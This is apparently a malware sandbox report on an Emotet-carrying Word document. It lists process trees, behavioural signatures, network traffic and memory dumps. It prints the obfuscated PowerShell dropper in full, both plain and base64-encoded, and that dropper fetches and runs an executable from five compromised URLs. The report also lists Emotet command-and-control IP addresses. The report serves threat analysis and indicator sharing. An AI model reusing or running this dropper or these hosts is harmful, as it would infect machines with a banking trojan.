Overview

overview

10

task1

 

10

task2

 

10

Analysis

  • max time kernel
    143s
  • resource
    win7v191014
  • submitted
    20/12/2019, 05:54 UTC

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Docs_8a1b1714e1ae0fabcf590df96af964ab.5

  • Sample

    191220-n4vfftm9rj

  • SHA256

    e8f4adbc33575dfdc6cc8046ec0478baee34237bda285c3e9fd4798aea4ea516

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
1
$Gvaunqbxbpyay='Tgmjwmphtrv';$Heteznecwokc = '662';$Oflxbtrnrfgs='Dfypbodi';$Qodqokwamomt=$env:userprofile+'\'+$Heteznecwokc+'.exe';$Qjqnhdrznfmk='Xiwfogdd';$Gcfiqjcpaw=&('n'+'ew-o'+'bjec'+'t') nET.webClIEnT;$Wlrmffmkvc='https://fanitv.com/sandbox/oQmLZD/*http://bicheru-cycling.ro/bbr/IEScmzh/*http://lesdebatsdecouzon.org/lddc/7wpe2-kckbz4za-25568/*https://4vetcbd.com/cgi-bin/CqCjQxYqx/*http://zlatebenz.mk/wp-content/6nlkz6y-lmfk-9136296721/'."Sp`liT"('*');$Ensgpzoghth='Dgoohfep';foreach($Tfgqtubxq in $Wlrmffmkvc){try{$Gcfiqjcpaw."dOwnloa`df`ilE"($Tfgqtubxq, $Qodqokwamomt);$Wrtsxtqpmgdj='Ljorgctvff';If ((.('G'+'e'+'t-Item') $Qodqokwamomt)."LEN`GTH" -ge 34359) {[Diagnostics.Process]::"ST`ART"($Qodqokwamomt);$Svxyxkuw='Gqnqeulzuldcx';break;$Jqzbmozytyt='Gyzownhat'}}catch{}}$Atfxnwqxglo='Vbhhstskfdtw'
URLs
exe.dropper

https://fanitv.com/sandbox/oQmLZD/
exe.dropper

http://bicheru-cycling.ro/bbr/IEScmzh/
exe.dropper

http://lesdebatsdecouzon.org/lddc/7wpe2-kckbz4za-25568/
exe.dropper

https://4vetcbd.com/cgi-bin/CqCjQxYqx/
exe.dropper

http://zlatebenz.mk/wp-content/6nlkz6y-lmfk-9136296721/

Extracted

Family

emotet

C2

98.178.241.106:80

190.171.153.139:80

179.5.118.12:8080

45.79.75.232:8080

124.150.175.133:80

164.68.115.146:8080

5.189.148.98:8080

46.105.128.215:8080

67.254.196.78:443

95.216.207.86:7080

181.46.176.38:80

98.15.140.226:80

217.12.70.226:80

115.179.91.58:80

41.190.148.90:80

162.144.46.90:8080

211.218.105.101:80

212.129.14.27:8080

120.51.83.89:443

200.41.121.69:443
rsa_pubkey.plain
1
-----BEGIN PUBLIC KEY-----
2
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAMqZMACZDzcRXuSnj2OI8LeIYKrbUIXL
3
faUgIJPwYd305HnaBS2AfA0R+oPxT32r+3BbayI3KguqAn3E+rbwtLhqhOXOlTnY
4
7yvG4ufmwCCkRzc6Sq8baToxmd6y523AIQIDAQAB
5
-----END PUBLIC KEY-----
6

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

    trojanbankeremotet
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Drops file in System32 directory 6 IoCs
  • Modifies registry class 144 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_8a1b1714e1ae0fabcf590df96af964ab.5.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    • Drops file in System32 directory
    PID:1300
  • C:\Windows\SYSTEM32\WISPTIS.EXE
    /QuitInfo:0000000000000604;000000000000064C;
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:2044
  • C:\Windows\SYSTEM32\WISPTIS.EXE
    /QuitInfo:0000000000000604;000000000000064C;
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1812
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABHAHYAYQB1AG4AcQBiAHgAYgBwAHkAYQB5AD0AJwBUAGcAbQBqAHcAbQBwAGgAdAByAHYAJwA7ACQASABlAHQAZQB6AG4AZQBjAHcAbwBrAGMAIAA9ACAAJwA2ADYAMgAnADsAJABPAGYAbAB4AGIAdAByAG4AcgBmAGcAcwA9ACcARABmAHkAcABiAG8AZABpACcAOwAkAFEAbwBkAHEAbwBrAHcAYQBtAG8AbQB0AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABIAGUAdABlAHoAbgBlAGMAdwBvAGsAYwArACcALgBlAHgAZQAnADsAJABRAGoAcQBuAGgAZAByAHoAbgBmAG0AawA9ACcAWABpAHcAZgBvAGcAZABkACcAOwAkAEcAYwBmAGkAcQBqAGMAcABhAHcAPQAmACgAJwBuACcAKwAnAGUAdwAtAG8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4ARQBUAC4AdwBlAGIAQwBsAEkARQBuAFQAOwAkAFcAbAByAG0AZgBmAG0AawB2AGMAPQAnAGgAdAB0AHAAcwA6AC8ALwBmAGEAbgBpAHQAdgAuAGMAbwBtAC8AcwBhAG4AZABiAG8AeAAvAG8AUQBtAEwAWgBEAC8AKgBoAHQAdABwADoALwAvAGIAaQBjAGgAZQByAHUALQBjAHkAYwBsAGkAbgBnAC4AcgBvAC8AYgBiAHIALwBJAEUAUwBjAG0AegBoAC8AKgBoAHQAdABwADoALwAvAGwAZQBzAGQAZQBiAGEAdABzAGQAZQBjAG8AdQB6AG8AbgAuAG8AcgBnAC8AbABkAGQAYwAvADcAdwBwAGUAMgAtAGsAYwBrAGIAegA0AHoAYQAtADIANQA1ADYAOAAvACoAaAB0AHQAcABzADoALwAvADQAdgBlAHQAYwBiAGQALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBDAHEAQwBqAFEAeABZAHEAeAAvACoAaAB0AHQAcAA6AC8ALwB6AGwAYQB0AGUAYgBlAG4AegAuAG0AawAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwA2AG4AbABrAHoANgB5AC0AbABtAGYAawAtADkAMQAzADYAMgA5ADYANwAyADEALwAnAC4AIgBTAHAAYABsAGkAVAAiACgAJwAqACcAKQA7ACQARQBuAHMAZwBwAHoAbwBnAGgAdABoAD0AJwBEAGcAbwBvAGgAZgBlAHAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFQAZgBnAHEAdAB1AGIAeABxACAAaQBuACAAJABXAGwAcgBtAGYAZgBtAGsAdgBjACkAewB0AHIAeQB7ACQARwBjAGYAaQBxAGoAYwBwAGEAdwAuACIAZABPAHcAbgBsAG8AYQBgAGQAZgBgAGkAbABFACIAKAAkAFQAZgBnAHEAdAB1AGIAeABxACwAIAAkAFEAbwBkAHEAbwBrAHcAYQBtAG8AbQB0ACkAOwAkAFcAcgB0AHMAeAB0AHEAcABtAGcAZABqAD0AJwBMAGoAbwByAGcAYwB0AHYAZgBmACcAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQAUQBvAGQAcQBvAGsAdwBhAG0AbwBtAHQAKQAuACIATABFAE4AYABHAFQASAAiACAALQBnAGUAIAAzADQAMwA1ADkAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBUAGAAQQBSAFQAIgAoACQAUQBvAGQAcQBvAGsAdwBhAG0AbwBtAHQAKQA7ACQAUwB2AHgAeQB4AGsAdQB3AD0AJwBHAHEAbgBxAGUAdQBsAHoAdQBsAGQAYwB4ACcAOwBiAHIAZQBhAGsAOwAkAEoAcQB6AGIAbQBvAHoAeQB0AHkAdAA9ACcARwB5AHoAbwB3AG4AaABhAHQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQQB0AGYAeABuAHcAcQB4AGcAbABvAD0AJwBWAGIAaABoAHMAdABzAGsAZgBkAHQAdwAnAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    PID:2020
    • C:\Users\Admin\662.exe
      "C:\Users\Admin\662.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2148
      • C:\Users\Admin\662.exe
        --2a4aec10
        3⤵
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        • Drops file in System32 directory
        PID:2168
  • C:\Windows\SysWOW64\stuckinbox.exe
    "C:\Windows\SysWOW64\stuckinbox.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:2228
    • C:\Windows\SysWOW64\stuckinbox.exe
      --c2a0bdfc
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      • Suspicious behavior: EmotetMutantsSpam
      • Suspicious behavior: EnumeratesProcesses
      • Drops file in System32 directory
      PID:2248

Network

  • 198.71.190.10:443
    fanitv.com
    Powershell.exe
  • 176.223.208.25:80
    bicheru-cycling.ro
    Powershell.exe
  • 98.178.241.106:80
    stuckinbox.exe
  • 98.178.241.106:80
    stuckinbox.exe
  • 190.171.153.139:80
    stuckinbox.exe
  • 10.7.0.255:137
  • 224.0.0.252:5355
  • 224.0.0.252:5355
  • 224.0.0.252:5355
  • 224.0.0.252:5355
  • 224.0.0.252:5355
  • 8.8.8.8:53
    fanitv.com

    DNS Request

    fanitv.com

    DNS Response

    198.71.190.10

  • 8.8.8.8:53
    bicheru-cycling.ro

    DNS Request

    bicheru-cycling.ro

    DNS Response

    176.223.208.25

  • 224.0.0.252:5355
  • 239.255.255.250:1900
  • 239.255.255.250:1900
  • 8.8.8.8:53
    dns.msftncsi.com

    DNS Request

    dns.msftncsi.com

    DNS Response

    131.107.255.255

  • 8.8.8.8:53
    dns.msftncsi.com

    DNS Request

    dns.msftncsi.com

    DNS Response

    fd3e:4f5a:5b81::1

  • 224.0.0.22

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1300-0-0x0000000006060000-0x0000000006064000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1300-3-0x00000000094E0000-0x00000000094E4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1300-1-0x00000000003E6000-0x00000000003EF000-memory.dmp

    Filesize

    36KB

    Download

  • memory/2148-9-0x0000000000560000-0x0000000000577000-memory.dmp

    Filesize

    92KB

    Download

  • memory/2168-13-0x0000000000650000-0x0000000000667000-memory.dmp

    Filesize

    92KB

    Download

  • memory/2168-14-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/2228-16-0x0000000000480000-0x0000000000497000-memory.dmp

    Filesize

    92KB

    Download

  • memory/2248-18-0x00000000003B0000-0x00000000003C7000-memory.dmp

    Filesize

    92KB

    Download

  • memory/2248-19-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.